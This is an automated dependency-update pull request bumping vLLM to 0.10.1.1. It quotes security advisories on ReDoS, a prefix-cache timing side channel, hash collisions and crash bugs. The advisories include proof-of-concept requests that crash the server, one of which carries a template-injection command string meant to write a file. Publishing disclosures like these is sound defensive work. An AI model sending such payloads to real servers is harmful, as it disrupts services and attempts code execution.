Update dependency vllm to v0.10.1.1 [SECURITY] #8
This PR contains the following updates:

| Package | Change |
|---|---|
| vllm | `==0.8.5` -> `==0.10.1.1` |
GitHub Vulnerability Alerts
CVE-2025-48887
Summary
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file
vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py
of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.
Details
The following regular expression is used to match tool/function call patterns:
This pattern contains multiple nested quantifiers (`*`, `+`), optional groups, and inner repetitions, which make it vulnerable to catastrophic backtracking.
Attack Example:
A malicious input such as
can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).
Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.
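The backtracking blow-up can be reproduced with a classic toy pattern (not vLLM's actual tool-call regex, which the advisory elides):

```python
import re
import time

# Classic ReDoS toy pattern (not vLLM's actual tool-call regex): nested
# quantifiers cause catastrophic backtracking when the trailing "!"
# makes a match impossible.
EVIL = re.compile(r"^(a+)+$")

def time_match(n: int) -> float:
    payload = "a" * n + "!"           # the "!" forces full backtracking
    start = time.perf_counter()
    EVIL.match(payload)               # returns None, but only after ~2**n steps
    return time.perf_counter() - start

for n in (10, 14, 18, 20):
    print(f"n={n:2d}  {time_match(n):.4f}s")  # time grows exponentially with n
```

Each additional character roughly doubles the matching time, so even short payloads can pin a CPU core.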
Impact
Fix
GHSA-j828-28rj-hfhp
Summary
A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.
1. vllm/lora/utils.py Line 173
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:
The pattern `r"\((.*?)\)\$?$"` matches content inside parentheses. If input such as `((((a|)+)+)+)` is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability. The non-greedy `.*?` inside the group parentheses is highly sensitive to input length and nesting complexity.
Remediation Suggestions:
2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52
Risk Description:
The pattern `r'functools\[(.*?)\]'` uses `.*?` to match content inside brackets, together with `re.DOTALL`. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.
Remediation Suggestions:
- Limit the length of `model_output`.
- Use `re.finditer()` and enforce a length constraint on each match.
3. vllm/entrypoints/openai/serving_chat.py Line 351
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351
Risk Description:
The pattern `r'.*"parameters":\s*(.*)'` can trigger backtracking if `current_text` is very long and contains repeated structures. A leading `.*` matching any content is high risk.
Remediation Suggestions:
- Limit `current_text` length.
- Avoid using `.*` to capture large blocks of text; prefer structured parsing when possible.
4. benchmarks/benchmark_serving_structured_output.py Line 650
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650
Risk Description:
The pattern `r'\{.*\}'` is used to extract JSON inside curly braces. If the `actual` string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
Remediation Suggestions:
- Limit the length of `actual`.
- Match balanced `{` and `}`, or use a robust JSON extraction tool.
Fix
CVE-2025-46570
This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.
Description
When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.
For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.
Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
Environment
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage
We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
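The hit/miss distinguishing step can be sketched with a toy simulation (the timing constants and jitter below are hypothetical, not measured vLLM values):

```python
import random
import statistics

# Toy simulation of the attack, not real measurements: assume a prefix
# cache hit shaves a fixed amount off TTFT, plus per-request jitter.
# All constants (50 ms vs 80 ms base, 5 ms jitter) are hypothetical.
random.seed(0)

def sample_ttft(cache_hit: bool) -> float:
    base = 0.050 if cache_hit else 0.080    # seconds
    return base + random.gauss(0.0, 0.005)  # scheduler/network jitter

hits = [sample_ttft(True) for _ in range(200)]
misses = [sample_ttft(False) for _ in range(200)]

# Simple threshold classifier: a TTFT below the midpoint is guessed "hit".
threshold = (statistics.mean(hits) + statistics.mean(misses)) / 2
tpr = sum(t < threshold for t in hits) / len(hits)      # true positive rate
fpr = sum(t < threshold for t in misses) / len(misses)  # false positive rate
print(f"TPR={tpr:.2f}  FPR={fpr:.2f}")
```

When the TTFT gap between hit and miss exceeds the jitter, even this naive threshold separates the two distributions almost perfectly, which is what the ROC analysis above demonstrates on real hardware.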

Results
In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:
Fixes
CVE-2025-46722
Summary
In the file `vllm/multimodal/hasher.py`, the `MultiModalHasher` class has a security and data integrity issue in its image hashing method. Currently, it serializes `PIL.Image.Image` objects using only `obj.tobytes()`, which returns only the raw pixel data, without including metadata such as the image's shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.
Details
vllm/multimodal/hasher.py
MultiModalHasher.serialize_item
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
For `Image.Image` instances, only `obj.tobytes()` is used for hashing. `obj.tobytes()` does not include the image's width, height, or mode metadata.
Recommendation
In the `serialize_item` method, serialization of `Image.Image` objects should include not only pixel data, but also all critical metadata, such as dimensions (`size`), color mode (`mode`), format, and especially the `info` dictionary. The `info` dictionary is particularly important for palette-based images (e.g., mode `'P'`), where the palette itself is stored in `info`. Ignoring `info` can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.
Summary: Serializing only the raw pixel data is insecure. Always include all image metadata (`size`, `mode`, `format`, `info`) in the hash calculation to prevent collisions, especially in cases like palette-based images.
Impact for other modalities
For the video modality, the input is transformed into a multi-dimensional numpy array encoding the video's height, width, duration, etc., so the same problem exists due to the incorrect serialization of that numpy array as well.
For audio, since `librosa.load` downmixes to mono by default, the loaded audio is automatically encoded into a single channel and returned as a one-dimensional numpy array, so the array structure is fixed and not affected by this issue.
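The shape-collision risk above can be illustrated without PIL, using raw bytes and hypothetical 96x32 vs 32x96 shapes:

```python
import hashlib

# Illustration without PIL: two "images" with different (hypothetical)
# shapes, 96x32 vs 32x96, but identical raw pixel bytes.
pixels = bytes(range(256)) * 12  # 3072 shared pixel bytes

def naive_hash(raw: bytes) -> str:
    # Hashing only the raw bytes, as obj.tobytes() would supply:
    # shape and mode are ignored entirely.
    return hashlib.sha256(raw).hexdigest()

def safe_hash(raw: bytes, size: tuple[int, int], mode: str) -> str:
    # Fold dimensions and color mode into the digest, as recommended;
    # a complete fix would also cover format and the info dict.
    h = hashlib.sha256()
    h.update(repr((size, mode)).encode())
    h.update(raw)
    return h.hexdigest()

# Both differently shaped images collide under the pixel-only hash...
print(naive_hash(pixels) == naive_hash(pixels))  # → True
# ...but produce distinct digests once shape metadata is included.
print(safe_hash(pixels, (96, 32), "L") == safe_hash(pixels, (32, 96), "L"))  # → False
```
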
Fixes
CVE-2025-48942
Summary
Hitting the /v1/completions API with an invalid `json_schema` as a guided param will kill the vLLM server.
Details
The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke an uncaught exception from xgrammar in
./lib64/python3.11/site-packages/xgrammar/compiler.py
Issue with more information: https://github.com/vllm-project/vllm/issues/17248
PoC
Make a call to vLLM with an invalid `json_schema`, e.g.
{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}
curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
Impact
vllm crashes
example traceback
Fix
CVE-2025-48943
Impact
A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.
Issue with more details: https://github.com/vllm-project/vllm/issues/17313
Patches
CVE-2025-48944
Summary
The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.
Details
The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:
RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.
For example, the following inputs will crash the worker:
- Unclosed `{`, `[`, or `(`
- Closed: `{}` and `[]`
Here are some of runtime errors on the crash depending on what gets injected:
RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
PoC
Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to an RCE-style payload; it could just as well have been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}
Impact
Backend workers can be crashed, causing anyone using the inference engine to receive 500 Internal Server Error responses on subsequent requests.
Fix
CVE-2025-48956
Summary
A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.
Details
The vulnerability leverages the abuse of HTTP headers. By setting a header such as `X-Forwarded-For` to a very large value like `("A" * 5_800_000_000)`, the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources.
Impact
What kind of vulnerability is it? Who is impacted?
Type of vulnerability: Denial of Service (DoS)
Resolution
Upgrade to a version of vLLM that includes appropriate HTTP limits by default, or use a proxy in front of vLLM which provides protection against this issue.
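As a stopgap, a reverse proxy can enforce header limits before requests reach vLLM; for example, with nginx (all sizes and the upstream address below are illustrative):

```nginx
# Illustrative nginx front-proxy limits; tune sizes for your deployment.
server {
    listen 80;
    client_header_buffer_size 1k;       # typical request line + headers
    large_client_header_buffers 4 8k;   # cap oversized individual headers
    client_max_body_size 4m;            # cap request bodies as well

    location / {
        proxy_pass http://127.0.0.1:8000;  # vLLM's default port
    }
}
```

Requests exceeding these buffers are rejected by nginx with a 4xx status before any memory is allocated on the vLLM side.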
Release Notes
vllm-project/vllm (vllm)
v0.10.1.1
Compare Source
This is a critical bugfix and security release:
- Fix CUTLASS MLA Full CUDAGraph (#23200)
- Limit HTTP header count and size (#23267): GHSA-rxc4-3w6r-4v47
- Do not use eval() to convert unknown types (#23266): GHSA-79j6-g2m3-jgfw
Full Changelog: vllm-project/vllm@v0.10.1...v0.10.1.1
v0.10.1
Compare Source
Highlights
v0.10.1 release includes 727 commits, 245 committers (105 new contributors).
Model Support
Engine Core
Hardware & Performance
- `reshape_and_cache_flash` CUDA kernel (#22036); CPU transfer support in NixlConnector (#18293)
Quantization
API & Frontend
Dependencies
- `pip install vllm[flashinfer]` for flexible installation (#21959)
V0 Deprecation
Important: As part of the ongoing V0 engine cleanup, several breaking changes have been introduced:
- Replaced `--task` with `--runner` and `--convert` options (#21470)
- Deprecated `--disable-log-requests` in favor of `--enable-log-requests` for clearer semantics (#21739)
- Renamed `--expand-tools-even-if-tool-choice-none` to `--exclude-tools-when-tool-choice-none` for consistency (#20544)
What's Changed
- `SpecializedManager` by @zhouwfang in https://github.com/vllm-project/vllm/pull/21407
- `--expand-tools-even-if-tool-choice-none` replaced with `--exclude-tools-when-tool-choice-none` for v0.10.0 by @okdshin in https://github.com/vllm-project/vllm/pull/20544
- `flashinfer` to `v0.2.8` by @cjackal in https://github.com/vllm-project/vllm/pull/21385
- `cutlass_fp4_group_mm` illegal memory access by @yewentao256 in https://github.com/vllm-project/vllm/pull/21465
- `run-batch` supports V1 by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/21541
- `site_url` for RunLLM by @hmellor in https://github.com/vllm-project/vllm/pull/21564
- `requirements/common.txt` to run unit tests by @zhouwfang in https://github.com/vllm-project/vllm/pull/21572
Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.